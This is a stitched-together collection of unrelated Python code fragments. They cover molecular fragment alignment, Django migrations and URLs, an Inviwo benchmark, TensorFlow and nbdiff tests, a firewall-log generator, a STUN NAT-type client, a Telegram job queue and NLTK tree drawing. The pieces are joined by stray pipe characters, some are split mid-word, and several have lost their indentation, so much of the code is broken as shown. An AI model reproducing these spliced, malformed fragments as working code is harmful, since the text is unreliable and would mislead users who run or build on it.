gm = pc3d.mean(axis=0)
r0Pm = pc3d - gm[None, :]
mu_Pm = np.zeros_like(r0Pm)
N = Ns[m]
for n, rfrag in enumerate(rfrag_lists):
# Skip rotation of 1-atom fragments
if len(rfrag) == 1:
continue
CPmn = CP[(m, n)]
RPmRn = get_rot_mat(
punion.coords3d[CPmn], runion.coords3d[CPmn], center=True
)
print(f"m={m}, n={n}, len(CPmn)={len(CPmn)}")
# Eq. (A2) in [1]
r0Pmn = np.einsum("ij,jk->ki", RPmRn, r0Pm.T)
mu_Pm += len(CPmn) ** 2 / N * r0Pmn
rot_mat = get_rot_mat(r0Pm, mu_Pm, center=True)
rot_coords = r0Pm.dot(rot_mat)
punion.coords3d[pfrag] = rot_coords + gm - rot_coords.mean(axis=0)
backup_coords(3)
print()
"""
STAGE 4
Alignment of reactive atoms
This stage involves three forces: hard-sphere forces and two kinds
of average translational (^t) and rotational (^r) forces (v and w,
(A3) - (A5) in [1]).
v^t and v^r arise from atoms in A^Rnm and A^Rmn, that is atoms that
participate in bond forming/breaking in R. The translational force
is usually attractive, which is counteracted by the repulsive hard-sphere
forces.
"""
print(highlight_text("Stage 4, Alignment Of Reactive Atoms"))
def composite_sd_opt(geom, keys_calcs, title, rms_force=0.05):
    """Steepest-descent relax *geom* under the sum of several calculators.

    keys_calcs maps label -> calculator; the Composite calculator sums
    all of them (the 'final' expression joins the labels with '+').
    """
    print(highlight_text(title, level=1))
    final = " + ".join([k for k in keys_calcs.keys()])
    calc = Composite(final, keys_calcs=keys_calcs)
    geom.set_calculator(calc)
    # Smaller steps than stage 2; this stage fine-tunes alignment.
    opt_kwargs = {
        "max_step": 0.05,
        "max_cycles": 2000,
        "rms_force": rms_force,
    }
    opt = SteepestDescent(geom, **opt_kwargs)
    opt.run()
def get_vr_trans_torque(kappa=1.0, do_trans=True):
    """TransTorque forces v^t/v^r among reactant fragments (AR vs. AR)."""
    return TransTorque(
        rfrag_lists, rfrag_lists, AR, AR, kappa=kappa, do_trans=do_trans
    )
def r_weight_func(m, n, a, b):
    """As required for (A5) in [1].

    Full weight for atoms active in bond forming/breaking (in BR),
    half weight otherwise.
    """
    if a in BR[(m, n)]:
        return 1
    return 0.5
def get_wr_trans_torque(kappa=1.0, do_trans=True):
    """TransTorque forces w^t/w^r coupling reactant to product fragments.

    Uses CR/CP correspondences and the product coordinates as the
    reference frame (b_coords3d).
    """
    return TransTorque(
        rfrag_lists,
        pfrag_lists,
        CR,
        CP,
        weight_func=r_weight_func,
        skip=False,
        b_coords3d=punion.coords3d,
        kappa=kappa,
        do_trans=do_trans,
    )
def get_vp_trans_torque(kappa=1.0, do_trans=True):
    """TransTorque forces v^t/v^r among product fragments (AP vs. AP)."""
    return TransTorque(
        pfrag_lists, pfrag_lists, AP, AP, kappa=kappa, do_trans=do_trans
    )
def p_weight_func(m, n, a, b):
    """As required for (A5) in [1].

    Full weight for atoms active in bond forming/breaking (in BP),
    half weight otherwise.
    """
    if a in BP[(m, n)]:
        return 1
    return 0.5
def get_wp_trans_torque(kappa=1.0, do_trans=True):
    """TransTorque forces w^t/w^r coupling product to reactant fragments.

    Mirror image of get_wr_trans_torque: CP/CR correspondences with the
    reactant coordinates as reference frame (b_coords3d).
    """
    return TransTorque(
        pfrag_lists,
        rfrag_lists,
        CP,
        CR,
        weight_func=p_weight_func,
        skip=False,
        b_coords3d=runion.coords3d,
        kappa=kappa,
        do_trans=do_trans,
    )
s4_hs_kappa = c["s4_hs_kappa"]
s4_v_kappa = c["s4_v_kappa"]
s4_w_kappa = c["s4_w_kappa"]
vr_trans_torque = get_vr_trans_torque(kappa=s4_v_kappa)
wr_trans_torque = get_wr_trans_torque(kappa=s4_w_kappa)
r_keys_calcs = {
"hardsphere": HardSphere(runion, rfrag_lists, kappa=s4_hs_kappa),
"v": vr_trans_torque,
"w": wr_trans_torque,
}
composite_sd_opt(runion, r_keys_calcs, "Reactants")
vp_trans_torque = get_vp_trans_torque(kappa=s4_v_kappa)
wp_trans_torque = get_wp_trans_torque(kappa=s4_w_kappa)
p_keys_calcs = {
"hardsphere": HardSphere( |
# -*- coding: utf-8 -*-
from __future__ impor | t unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Alter Broadcast: make 'series' FK nullable/blank, widen 'status'."""

    dependencies = [
        ('broadcasts', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='broadcast',
            name='series',
            # NOTE(review): the b'broadcasts' bytes literal is a Python 2
            # makemigrations artifact; left untouched since migrations are
            # historical records.
            field=models.ForeignKey(related_name=b'broadcasts', blank=True, to='broadcasts.Series', null=True),
        ),
        migrations.AlterField(
            model_name='broadcast',
            name='status',
            field=models.CharField(max_length=200, blank=True),
        ),
    ]
|
"""
WSGI config for tiendalibros project.
It exposes the WSGI callable as a module-level variable named ``application``.
|
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_ap | plication
# Point Django at the project settings (if not already set) before the
# WSGI application object is instantiated.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tiendalibros.settings")
application = get_wsgi_application()
|
# Inviwo Python script
import inviwo
import math
import time
# time.clock() was deprecated in Python 3.3 and removed in 3.8;
# time.perf_counter() is the documented replacement for benchmarking.
start = time.perf_counter()
scale = 1
d = 15
steps = 120
# First sweep: orbit the camera around the origin at height 3*scale.
for i in range(0, steps):
    r = (2 * 3.14 * i) / steps
    x = d * math.sin(r)
    z = -d * math.cos(r)
    inviwo.setPropertyValue("EntryExitPoints.camera",
                            ((x * scale, 3 * scale, z * scale), (0, 0, 0), (0, 1, 0)))
# Second sweep: rotate the camera's up-vector through a full turn.
for i in range(0, steps):
    r = (2 * 3.14 * i) / (steps)
    x = 1.0 * math.sin(r)
    z = 1.0 * math.cos(r)
    inviwo.setCameraUp("EntryExitPoints.camera", (x * scale, z * scale, 0))
end = time.perf_counter()
# Two sweeps of 'steps' frames each were rendered.
fps = 2 * steps / (end - start)
fps = round(fps, 3)
print("Frames per second: " + str(fps))
print("Time per frame: " + str(round(1000 / fps, 1)) + " ms")
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for experiment utils."""
import numpy as np
import os
import tempfile
import tensorflow as tf
import experiment_utils
class AsymmetricSaverTest(tf.test.TestCase):
    """Tests for asymmetric saver."""

    def test_save_restore(self):
        """x must round-trip via its own checkpoint; y comes from RestoreSpec."""
        x = tf.get_variable('x', [])
        y = tf.get_variable('y', [])
        x_dir = tempfile.mkdtemp()
        y_dir = tempfile.mkdtemp()
        x_checkpoint_base = os.path.join(x_dir, 'model.ckpt')
        y_checkpoint_base = os.path.join(y_dir, 'model.ckpt')
        normal_saver = tf.train.Saver([x, y])
        # Save a checkpoint into y_dir first.
        with self.test_session() as sess:
            sess.run(tf.global_variables_initializer())
            normal_saver.save(sess, y_checkpoint_base, global_step=0)
        saver = experiment_utils.AsymmetricSaver(
            [x], [experiment_utils.RestoreSpec(
                [y], os.path.join(y_dir, 'model.ckpt-0'))])
        # Write an x checkpoint.
        with self.test_session() as sess:
            sess.run(tf.global_variables_initializer())
            x_initial, y_initial = sess.run([x, y])
            saver.save(sess, x_checkpoint_base)
        # Load using AsymmetricSaver.
        with self.test_session() as sess:
            sess.run(tf.global_variables_initializer())
            saver.restore(sess, tf.train.latest_checkpoint(x_dir))
            x_final, y_final = sess.run([x, y])
        # Make sure that x is loaded correctly from checkpoint, and that y
        # isn't.
        self.assertEqual(x_initial, x_final)
        self.assertNotAllClose(y_initial, y_final)
class FilterNormalizationTest(tf.test.TestCase):
    """Tests for per-filter weight normalization."""

    def test_basic(self):
        """weights/biases pairs share norms; unpaired weights normalize alone."""
        u = tf.get_variable('abcdef/weights', shape=[7, 5, 3, 2])
        v = tf.get_variable('abcdef/biases', shape=[2])
        w = tf.get_variable('unpaired/weights', shape=[7, 5, 3, 2])
        x = tf.get_variable('untouched', shape=[])
        normalize_ops = experiment_utils.normalize_all_filters(
            tf.trainable_variables())
        with self.test_session() as sess:
            sess.run(tf.global_variables_initializer())
            u_initial, v_initial, w_initial, x_initial = sess.run([u, v, w, x])
            sess.run(normalize_ops)
            u_final, v_final, w_final, x_final = sess.run([u, v, w, x])
        # Per-output-channel L2 norms over the spatial/input axes.
        u_norms = np.sqrt(np.sum(np.square(u_initial), axis=(0, 1, 2)))
        w_norms = np.sqrt(np.sum(np.square(w_initial), axis=(0, 1, 2)))
        # We expect that the abcdef weights are normalized in pairs, that
        # the unpaired weights are normalized on their own, and the
        # untouched weights are in fact untouched.
        self.assertAllClose(np.array(u_final * u_norms), u_initial)
        self.assertAllClose(np.array(v_final * u_norms), v_initial)
        self.assertAllClose(np.array(w_final * w_norms), w_initial)
        self.assertAllClose(x_initial, x_final)
class AssignmentHelperTest(tf.test.TestCase):
    """Tests for AssignmentHelper's flat assign/retrieve round-trip."""

    def test_basic(self):
        """A flat vector fills x then y in order; z is excluded."""
        x = tf.get_variable('x', shape=[2, 3])
        y = tf.get_variable('y', shape=[4])
        # Deliberately not passed to the helper below.
        tf.get_variable('z', shape=[5, 6])
        helper = experiment_utils.AssignmentHelper([x, y])
        with self.test_session() as sess:
            helper.assign(np.arange(10.0), sess)
            self.assertAllClose(sess.run(x),
                                [[0.0, 1.0, 2.0], [3.0, 4.0, 5.0]])
            self.assertAllClose(sess.run(y), [6.0, 7.0, 8.0, 9.0])
            self.assertAllClose(
                helper.retrieve(sess),
                [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0])
if __name__ == '__main__':
    # Delegate discovery/execution to the TensorFlow test runner.
    tf.test.main()
|
#!/usr/bin/python
'''
This script is used to generate a set of random-ish events to
simulate log data from a Juniper Netscreen FW. It was built
around using netcat to feed data into Flume for ingestion
into a Hadoop cluster.
Once you have Flume configured you would use the following
command to populate data:
./gen_events.py 2>&1 | nc 127.0.0.1 9999
'''
import random
from netaddr import *
from time import sleep
# Candidate field values for the synthetic firewall events.
protocols = ['6', '17']  # TCP and UDP protocol numbers.
common_ports = ['20','21','22','23','25','80','109','110','119','143','156','161','389','443']
action_list = ['Deny', 'Accept', 'Drop', 'Reject']
src_network = IPNetwork('192.168.1.0/24')
dest_network = IPNetwork('172.35.0.0/16')

# 'with' guarantees the replay log is flushed and closed even when the
# endless generator loop is interrupted (Ctrl-C / broken pipe); the old
# trailing fo.close() after the infinite loop was unreachable.
with open("replay_log.txt", "w") as fo:
    while True:
        # random.choice replaces the index-then-subscript dance and draws
        # from the same uniform distribution.
        protocol = random.choice(protocols)
        src_port = random.choice(common_ports)
        dest_port = random.choice(common_ports)
        action = random.choice(action_list)
        # Skip .0 addresses; the upper bounds match the /24 and /16 sizes.
        src_ip = src_network[random.randint(1, 254)]
        dest_ip = dest_network[random.randint(1, 65535)]
        event = "192.168.1.3 Netscreen-FW1: NetScreen device_id=Netscreen-FW1 [Root]system-notification-00257(traffic): start_time=\"YYYY-MM-DD HH:MM:SS\" duration=0 policy_id=125 service=syslog proto=%s src zone=Untrust dst zone=Trust action=%s sent=0 rcvd=0 src=%s dst=%s src_port=%s dst_port=%s session_id=0" % (protocol, action, src_ip, dest_ip, src_port, dest_port)
        fo.write(event + "\n")
        # Parenthesized single-argument print works under Python 2 and 3.
        print(event)
        sleep(0.3)
|
import struct, socket, time, logging
from gosh.config import STUN_SERVER, STUN_PORT, logger
from gosh import JsonSocket
#=============================================================================
# STUN Client
# ============================================================================
class StunClient(object):
    """Discover NAT mapping/filtering behavior against a STUN-like server.

    Python 2 code. Talks JSON over a project-specific ``JsonSocket``
    (not wire-format STUN). Works in TCP mode (fixed local port reused
    across requests) or UDP mode (one connected socket kept open).
    """
    ## defined protocol
    TCP='TCP'
    UDP='UDP'

    def __init__(self, pro):
        # TCP mode tracks a reusable local port; UDP mode tracks the socket.
        self.tcp=False
        if pro == 'TCP':
            self.tcp = True
            self.port = None
        else:
            self.sock = None

    def NAT_Behavior_Discovery(self):
        """Run the mapping test, then (UDP only) the filtering test.

        Returns a (mapping, filtering) pair of integer classification
        codes; filtering is 0 in TCP mode where it cannot be measured.
        """
        mapping = self.mapping_behavior()
        # Reset per-test transport state between the two test phases.
        if self.tcp:
            self.port = None
        elif self.sock:
            self.sock.close()
            self.sock = None
        if self.tcp:
            filtering = 0
        else:
            filtering = self.filtering_behavior()
        if self.sock:
            self.sock.close()
            self.sock = None
        return mapping, filtering

    def CreateMessage(self, changeip=False, changeport=False):
        """ create message binding request"""
        data = {}
        data["STUN-TYPE"] = 'BINDING_REQUEST'
        data["CHANGE-REQUEST"] = 'CHANGE-REQUEST'
        # Ask the server to reply from an alternate IP and/or port.
        data["CHANGE-IP"] = changeip
        data["CHANGE-PORT"] = changeport
        return data

    def binding_request(self, server, port, request, mapping=False):
        """ check nat type

        Sends one binding request and returns the decoded response dict,
        or False on timeout/connect failure. Also records the local
        address used in self.local_addr.
        """
        udpconnect = False
        if self.tcp:
            # Fresh TCP socket per request, re-bound to the same local
            # port (SO_REUSEADDR) so the NAT mapping can be compared.
            self.sock = JsonSocket(JsonSocket.TCP)
            self.sock.set_reuseaddr()
            if self.port:
                self.sock.bind(self.port)
                logger.debug("binding_request: Bind on port %d" %self.port)
            else:
                self.port = self.sock.bind(0)
        else:
            if not self.sock:
                self.sock = JsonSocket(JsonSocket.UDP)
            if mapping:
                udpconnect = True
        self.sock.set_timeout(3)
        if self.sock.connect(server, port, udpconnect):
            self.sock.send_obj(request)
            try:
                data = self.sock.read_obj()
            except Exception, e:
                logger.debug("binding_request: %s" %e)
                return False
            self.local_addr = self.sock.getsockname()
            logger.debug("binding_request: Local address %s:%d" %self.local_addr)
            if self.tcp:
                self.sock.close()
            else:
                self.sock.set_timeout(None)
            # NOTE(review): a 'BINDING-RESPONSE' key is treated as a
            # failure marker here — confirm against the server protocol.
            if 'BINDING-RESPONSE' in data:
                return False
            return data
        return False

    def mapping_behavior(self):
        """ mapping behavior testing nat

        Returns 10 (no NAT), 1 (endpoint-independent), 2 (address-
        dependent), 3 (address-and-port-dependent), or 4/5 for TCP NATs
        with near-sequential increasing/decreasing port allocation;
        False on network failure.
        """
        message = self.CreateMessage()
        data = self.binding_request(STUN_SERVER, STUN_PORT, message, True)
        if not data:
            return False
        #=============================================
        # TEST I
        # ============================================
        logger.debug("mapping_behavior: TEST_I")
        LOCAL_ADDR = "%s:%d" % self.local_addr
        TEST_I = data['XOR-MAPPED-ADDRESS']
        logger.debug("mapping_behavior: Public IP %s"%TEST_I)
        OTHER_SERVER, OTHER_PORT = data['OTHER-ADDRESS'].split(":")
        if LOCAL_ADDR == TEST_I:
            # Public address equals local address: no translation.
            return 10
        else:
            #=============================================
            # TEST II
            # ============================================
            logger.debug("mapping_behavior: TEST_II")
            message = self.CreateMessage()
            data = self.binding_request(OTHER_SERVER, STUN_PORT, message, True)
            if not data:
                return False
            TEST_II = data['XOR-MAPPED-ADDRESS']
            logger.debug("mapping_behavior: Public IP %s"%TEST_II)
            if TEST_I == TEST_II:
                # Same mapping toward a different server IP.
                return 1
            else:
                #=============================================
                # TEST III
                # ============================================
                logger.debug("mapping_behavior: TEST_III")
                message = self.CreateMessage()
                data = self.binding_request(OTHER_SERVER, int(OTHER_PORT), message, True)
                if not data:
                    return False
                TEST_III = data['XOR-MAPPED-ADDRESS']
                logger.debug("mapping_behavior: Public IP %s"%TEST_III)
                if TEST_II == TEST_III:
                    # Mapping changes with server IP but not server port.
                    return 2
                else:
                    if self.tcp:
                        # Check for a predictable (near-sequential)
                        # external port allocation pattern.
                        port1 = int(TEST_I.split(":")[1])
                        port2 = int(TEST_II.split(":")[1])
                        port3 = int(TEST_III.split(":")[1])
                        if abs(port2-port1) < 5 and abs(port3-port1) <5:
                            if port1 < port2 < port3:
                                return 4
                            elif port1 > port2 > port3:
                                return 5
                    return 3

    def filtering_behavior(self):
        """ filtering behavior testing nat

        Returns 1 (endpoint-independent), 2 (address-dependent) or
        3 (address-and-port-dependent); False on network failure.
        """
        #=============================================
        # TEST I
        # ============================================
        logger.debug("filtering_behavior: TEST_I")
        message = self.CreateMessage()
        data = self.binding_request(STUN_SERVER, STUN_PORT, message)
        if not data:
            return False
        #=============================================
        # TEST II
        # ============================================
        logger.debug("filtering_behavior: TEST_II")
        # Reply requested from a different server IP *and* port.
        message = self.CreateMessage(changeip=True, changeport=True)
        data = self.binding_request(STUN_SERVER, STUN_PORT, message)
        if data:
            return 1
        else:
            logger.debug("filtering_behavior: TEST_III")
            #=============================================
            # TEST III
            # ============================================
            # Reply requested from the same IP but a different port.
            message = self.CreateMessage(changeip=False, changeport=True)
            data = self.binding_request(STUN_SERVER, STUN_PORT, message)
            if data:
                return 2
            else:
                return 3
|
from django.conf.urls.defaults import *
from models import Entry, Tag
from django.vie | ws.generic.dates import ArchiveIndexView, DateDetailView
from django.views.generic import TemplateView
urlpatterns = patterns('',
url(r'^/?$', ArchiveIndexView.as_view(model=Entry, date_field="published_on"), name="news-main"),
# url(r'^(?P<year>\d{4})/(?P<month>\d{1,2})/(?P<day>\d{1,2})/(?P<slug>[0-9A-Za-z-]+)/$', 'date_based.object_detail', dict(entry_dict, slug_field='slug', month_format='%m'),name="news-detail"),
url(r'^(?P<year>\d+)/(?P<month>[-\w]+ | )/(?P<day>\d+)/(?P<pk>\d+)/$',
DateDetailView.as_view(model=Entry, date_field="published_on"),
name="news_detail"),
url(r'^about/$', TemplateView.as_view(template_name='news/about.html'), name='news-about'),
)
|
from collections imp | ort OrderedDict
# Read n words from stdin, then report how many distinct words were seen
# and the occurrence count of each word in first-appearance order.
n = int(input())
occurrences = OrderedDict()
for _ in range(n):
    word = input().strip()
    occurrences[word] = occurrences.get(word, 0) + 1
print(len(occurrences))
print(" ".join(str(count) for count in occurrences.values()))
|
from nbdiff.adapter import git_adapter as g
from pretend import stub
def test_get_modified_notebooks_empty():
    """With no modified/unmerged files reported by git, result is empty."""
    # Stub subprocess: inside a work tree, but every listing is empty.
    g.subprocess = stub(check_output=lambda cmd: 'true\n'
                        if '--is-inside-work-tree' in cmd
                        else '')
    adapter = g.GitAdapter()
    result = adapter.get_modified_notebooks()
    assert result == []
def test_get_modified_notebooks_deleted():
    """Modified notebooks missing from disk are skipped from the result."""
    adapter = g.GitAdapter()

    def check_output_stub(cmd):
        # Fake git output for each flag the adapter queries.
        if '--modified' in cmd:
            output = '''foo.ipynb
bar.ipynb
foo.txt
baz.ipynb
'''
            return output
        elif '--unmerged' in cmd:
            # NOTE(review): '{i}' is a literal here (no .format call), so
            # three identical lines are produced; presumably only the
            # filename field matters to the adapter — confirm.
            return ''.join([
                '100755\thash\t{i}\tfoo.ipynb\n'
                for i in [1, 2, 3]
            ])
        elif '--is-inside-work-tree' in cmd:
            return 'true\n'
        elif '--show-toplevel' in cmd:
            return '/home/user/Documents'

    def popen(*args, **kwargs):
        return stub(stdout=stub(read=lambda: ""))

    g.open = lambda fname: stub(read=lambda: "")
    g.subprocess = stub(
        check_output=check_output_stub,
        PIPE='foo',
        Popen=popen,
    )
    # Pretend only bar.ipynb still exists on disk.
    g.os.path.exists = lambda path: 'bar.ipynb' in path
    result = adapter.get_modified_notebooks()
    assert result[0][2] == 'bar.ipynb'
    assert len(result) == 1
def test_get_modified_notebooks():
    """Only .ipynb files that are modified and not unmerged are returned."""
    adapter = g.GitAdapter()

    def check_output_stub(cmd):
        # Fake git output for each flag the adapter queries; foo.ipynb is
        # also unmerged, so it must be excluded from the modified list.
        if '--modified' in cmd:
            output = '''foo.ipynb
bar.ipynb
foo.txt
baz.ipynb
'''
            return output
        elif '--unmerged' in cmd:
            # NOTE(review): '{i}' is a literal here (no .format call); see
            # the sibling test — presumably only the filename field matters.
            return ''.join([
                '100755\thash\t{i}\tfoo.ipynb\n'
                for i in [1, 2, 3]
            ])
        elif '--is-inside-work-tree' in cmd:
            return 'true\n'
        elif '--show-toplevel' in cmd:
            return '/home/user/Documents'

    def popen(*args, **kwargs):
        return stub(stdout=stub(read=lambda: ""))

    g.open = lambda fname: stub(read=lambda: "")
    g.subprocess = stub(
        check_output=check_output_stub,
        PIPE='foo',
        Popen=popen,
    )
    # Every path "exists" on disk in this variant.
    g.os.path.exists = lambda path: True
    result = adapter.get_modified_notebooks()
    assert result[0][2] == 'bar.ipynb'
    assert result[1][2] == 'baz.ipynb'
    assert len(result) == 2
def test_get_unmerged_notebooks_empty():
    """With no unmerged files reported by git, result is empty."""
    # Stub subprocess: inside a work tree, but every listing is empty.
    g.subprocess = stub(check_output=lambda cmd: 'true\n'
                        if '--is-inside-work-tree' in cmd
                        else '')
    adapter = g.GitAdapter()
    result = adapter.get_unmerged_notebooks()
    assert result == []
def test_get_unmerged_notebooks():
    """Unmerged .ipynb files are returned with absolute paths; .py ignored."""
    adapter = g.GitAdapter()

    def check_output_stub(cmd):
        if '--unmerged' in cmd:
            # Three index stages per file, git ls-files -u style.
            # NOTE(review): '{i}' is a literal (no .format call); presumably
            # only the filename field matters to the adapter — confirm.
            f1 = ''.join([
                '100755\thash\t{i}\tfoo.ipynb\n'
                for i in [1, 2, 3]
            ])
            f2 = ''.join([
                '100755\thash\t{i}\tbar.ipynb\n'
                for i in [1, 2, 3]
            ])
            f3 = ''.join([
                '100755\thash\t{i}\tfoo.py\n'
                for i in [1, 2, 3]
            ])
            return f1 + f2 + f3
        elif '--is-inside-work-tree' in cmd:
            return 'true\n'
        elif '--show-toplevel' in cmd:
            return '/home/user/Documents'

    def popen(*args, **kwargs):
        return stub(stdout=stub(read=lambda: ""))

    g.open = lambda fname: stub(read=lambda: "")
    g.subprocess = stub(
        check_output=check_output_stub,
        PIPE='foo',
        Popen=popen,
    )
    result = adapter.get_unmerged_notebooks()
    assert len(result) == 2
    assert result[0][3] == '/home/user/Documents/foo.ipynb'
    assert result[1][3] == '/home/user/Documents/bar.ipynb'
|
of the loop only if `self.put()` had triggered
# `self.__tick` because `self._next_peek` wasn't set
self.logger.debug("Next task isn't due yet. Finished!")
self.queue.put((t, job))
self._set_next_peek(t)
break
if job.removed:
self.logger.debug('Removing job %s', job.name)
continue
if job.enabled:
try:
current_week_day = datetime.datetime.now().weekday()
if any(day == current_week_day for day in job.days):
self.logger.debug('Running job %s', job.name)
job.run(self.bot)
except:
self.logger.exception('An uncaught error was raised while executing job %s',
job.name)
else:
self.logger.debug('Skipping disabled job %s', job.name)
if job.repeat and not job.removed:
self._put(job, last_t=t)
else:
self.logger.debug('Dropping non-repeating or removed job %s', job.name)
def start(self):
    """Starts the job_queue thread.

    Idempotent: if the queue is already running, only the lock is
    released and nothing else happens.
    """
    self.__start_lock.acquire()
    if not self._running:
        self._running = True
        # Release before spawning so the new thread is never blocked on
        # this lock during startup.
        self.__start_lock.release()
        self.__thread = Thread(target=self._main_loop, name="job_queue")
        self.__thread.start()
        self.logger.debug('%s thread started', self.__class__.__name__)
    else:
        self.__start_lock.release()
def _main_loop(self):
    """
    Thread target of thread ``job_queue``. Runs in background and performs ticks on the job
    queue.

    Sleeps until the next scheduled peek (or indefinitely when nothing
    is scheduled), waking early when the tick event is set by put()
    or stop().
    """
    while self._running:
        # self._next_peek may be (re)scheduled during self.tick() or self.put()
        with self.__next_peek_lock:
            # Compute remaining wait; None means wait until woken.
            tmout = self._next_peek - time.time() if self._next_peek else None
            self._next_peek = None
            self.__tick.clear()
        self.__tick.wait(tmout)
        # If we were woken up by self.stop(), just bail out
        if not self._running:
            break
        self.tick()
    self.logger.debug('%s thread stopped', self.__class__.__name__)
def stop(self):
"""Stops the thread."""
with self.__start_lock:
self._running = False
self.__tick.set()
if self.__thread is not None:
self.__thread.join()
def jobs(self):
"""Returns a tuple of all jobs that are currently in the ``JobQueue``."""
return tuple(job[1] for job in self.queue.queue if job)
class Job(object):
"""This class encapsulates a Job.
Attributes:
callback (:obj:`callable`): The callback function that should be executed by the new job.
context (:obj:`object`): Optional. Additional data needed for the callback function.
name (:obj:`str`): Optional. The name of the new job.
Args:
callback (:obj:`callable`): The callback function that should be executed by the new job.
It should take ``bot, job`` as parameters, where ``job`` is the
            :class:`telegram.ext.Job` instance. It can be used to access its :attr:`context`
or change it to a repeating job.
interval (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta`, optional): The interval in
which the job will run. If it is an :obj:`int` or a :obj:`float`, it will be
interpreted as seconds. If you don't set this value, you must | set :attr:`repeat` to
``False`` and specify :attr:`next_t` when you put the job into the job queue.
        repeat (:obj:`bool`, optional): If this job should periodically execute its callback
function (``True``) or only once (``False``). Defaults to ``True``.
context (:obj:`object`, optional): Additional data needed for the callback function. Can be
accessed through ``job.context`` in the callback. Defaults to ``None``.
name (:obj:`str`, optional): The name of the new job. Defaults to ``callback.__name__``.
days (Tuple[:obj:`int`], optional): Defines on which days of the week the job should run.
Defaults to ``Days.EVERY_DAY``
job_queue (class:`telegram.ext.JobQueue`, optional): The ``JobQueue`` this job belongs to.
Only optional for backward compatibility with ``JobQueue.put()``.
"""
    def __init__(self,
                 callback,
                 interval=None,
                 repeat=True,
                 context=None,
                 days=Days.EVERY_DAY,
                 name=None,
                 job_queue=None):
        """Create a new Job; see the class docstring for argument semantics."""
        self.callback = callback
        self.context = context
        self.name = name or callback.__name__
        # Assignment order matters: the `interval` property setter reads
        # `self.repeat`, and the `repeat` setter reads `self.interval`, so the
        # backing fields are primed before the validating setters run.
        self._repeat = repeat
        self._interval = None
        self.interval = interval
        self.repeat = repeat
        self._days = None
        self.days = days
        # Weak proxy: a job must not keep its owning queue alive by itself.
        self._job_queue = weakref.proxy(job_queue) if job_queue is not None else None
        self._remove = Event()
        self._enabled = Event()
        self._enabled.set()
    def run(self, bot):
        """Executes the callback function, passing ``bot`` and this job."""
        self.callback(bot, self)
    def schedule_removal(self):
        """
        Schedules this job for removal from the ``JobQueue``. It will be removed without executing
        its callback function again.
        """
        # Event-based flag; the queue checks `removed` before each run.
        self._remove.set()
    @property
    def removed(self):
        """:obj:`bool`: Whether this job is due to be removed."""
        return self._remove.is_set()
    @property
    def enabled(self):
        """:obj:`bool`: Whether this job is enabled (disabled jobs are skipped, not removed)."""
        return self._enabled.is_set()
    @enabled.setter
    def enabled(self, status):
        # Backed by an Event, so toggling is safe from other threads.
        if status:
            self._enabled.set()
        else:
            self._enabled.clear()
    @property
    def interval(self):
        """
        :obj:`int` | :obj:`float` | :obj:`datetime.timedelta`: Optional. The interval in which the
        job will run.
        """
        return self._interval
    @interval.setter
    def interval(self, interval):
        # A repeating job without an interval could never be rescheduled.
        if interval is None and self.repeat:
            raise ValueError("The 'interval' can not be 'None' when 'repeat' is set to 'True'")
        if not (interval is None or isinstance(interval, (Number, datetime.timedelta))):
            raise ValueError("The 'interval' must be of type 'datetime.timedelta',"
                             " 'int' or 'float'")
        self._interval = interval
    @property
    def interval_seconds(self):
        """:obj:`int`: The interval for this job in seconds (timedeltas are converted)."""
        if isinstance(self.interval, datetime.timedelta):
            return self.interval.total_seconds()
        else:
            return self.interval
    @property
    def repeat(self):
        """:obj:`bool`: Optional. If this job should periodically execute its callback function."""
        return self._repeat
    @repeat.setter
    def repeat(self, repeat):
        # Mirror of the validation in the `interval` setter, from the other side.
        if self.interval is None and repeat:
            raise ValueError("'repeat' can not be set to 'True' when no 'interval' is set")
        self._repeat = repeat
    @property
    def days(self):
        """Tuple[:obj:`int`]: Optional. Defines on which days of the week the job should run."""
        return self._days
@days.setter
def days(self, days):
if not isinstance(days, tuple):
raise ValueError("The 'days' argument should be of type 'tuple'")
if not all(isinstance(day, int) for day in days):
raise ValueError("The elements of the 'days' argument should be of type 'int'")
if not all(0 <= day <= 6 for day in days):
raise ValueError("The elements of the 'days' argument should be from 0 up to and "
|
        # Add a display showing the error token itself:
s = s.replace('\n', ' ').replace('\t', ' ')
offset = pos
if len(s) > pos+10:
s = s[:pos+10]+'...'
if pos > 10:
s = '...'+s[pos-10:]
offset = 13
msg += '\n%s"%s"\n%s^' % (' '*16, s, ' '*(17+offset))
raise ValueError(msg)
#////////////////////////////////////////////////////////////
# Visualization & String Representation
#////////////////////////////////////////////////////////////
    def draw(self):
        """
        Open a new window containing a graphical diagram of this tree.
        """
        # Local import: the Tk-based drawing machinery is only needed (and
        # only importable) when a window is actually requested.
        from nltk.draw.tree import draw_trees
        draw_trees(self)
def pretty_print(self, sentence=None, highlight=(), stream=None, **kwargs):
"""
Pretty-print this tree as ASCII or Unicode art.
For explanation of the arguments, see the documentation for
`nltk.treeprettyprinter.TreePrettyPrinter`.
"""
from nltk.treeprettyprinter import TreePrettyPrinter
print(TreePrettyPrinter(self, sentence, highlight).text(**kwargs),
file=stream)
def __repr__(self):
childstr = ", ".join(unicode_repr(c) for c in self)
return '%s(%s, [%s])' % (type(self).__name__, unicode_repr(self._label), childstr)
    def _repr_png_(self):
        """
        Draws and outputs in PNG for ipython.
        PNG is used instead of PDF, since it can be displayed in the qt console and
        has wider browser support.
        """
        import os
        import base64
        import subprocess
        import tempfile
        from nltk.draw.tree import tree_to_treesegment
        from nltk.draw.util import CanvasFrame
        from nltk.internals import find_binary
        # Render the tree onto an off-screen Tk canvas, then dump it to
        # PostScript and convert with ghostscript.
        _canvas_frame = CanvasFrame()
        widget = tree_to_treesegment(_canvas_frame.canvas(), self)
        _canvas_frame.add_widget(widget)
        x, y, w, h = widget.bbox()
        # print_to_file uses scrollregion to set the width and height of the pdf.
